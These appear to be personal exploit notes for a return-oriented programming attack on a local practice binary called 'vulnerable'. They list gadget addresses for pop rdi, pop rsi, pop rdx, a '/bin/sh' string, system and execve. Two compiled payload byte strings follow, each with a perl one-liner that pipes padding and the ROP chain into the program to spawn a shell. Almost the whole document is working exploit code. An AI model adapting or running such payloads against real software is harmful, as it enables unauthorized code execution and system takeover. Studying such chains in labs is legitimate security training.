My gadgets (little-endian)
--------------------------
42240203 pop rdi; ret;
60111603 &"/bin/sh"
f0140403 &system
e5400203 pop rsi, ret;
8e1b0003 pop rdx; ret;
e07a0b03 execve instructs.



Compiled exploit:
-----------------

[1] With 0's
------------

\x00\x00\x00\x00\x42\x24\x02\x03\x00\x00\x00\x00\x60\x11\x16\x03\x00\x00\x00\x00\xe5\x40\x02\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8e\x1b\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x7a\x0b\x03

perl -e 'print "\x00"x68; print "\x00\x00\x00\x00\x42\x24\x02\x03\x00\x00\x00\x00\x60\x11\x16\x03\x00\x00\x00\x00\xe5\x40\x02\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8e\x1b\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x7a\x0b\x03"' | ./vulnerable test


[2] With pointers
-----------------

\x00\x00\x00\x00\x42\x24\x02\x03\x00\x00\x00\x00\x60\x11\x16\x03\x00\x00\x00\x00\xe5\x40\x02\x03\x00\x00\x00\x00\xb0\xfe\xff\x4f\x00\x00\x00\x00\x8e\x1b\x00\x03\x00\x00\x00\x00\xb0\xfe\xff\x4f\x00\x00\x00\x00\xe0\x7a\x0b\x03

perl -e 'print "\x60\x11\x16\x03"; print "\x00"x64; print "\x00\x00\x00\x00\x42\x24\x02\x03\x00\x00\x00\x00\x60\x11\x16\x03\x00\x00\x00\x00\xe5\x40\x02\x03\x00\x00\x00\x00\xb0\xfe\xff\x4f\x00\x00\x00\x00\x8e\x1b\x00\x03\x00\x00\x00\x00\xb4\xfe\xff\x4f\x00\x00\x00\x00\xe0\x7a\x0b\x03"' | strace ~/Desktop/vulnerable test

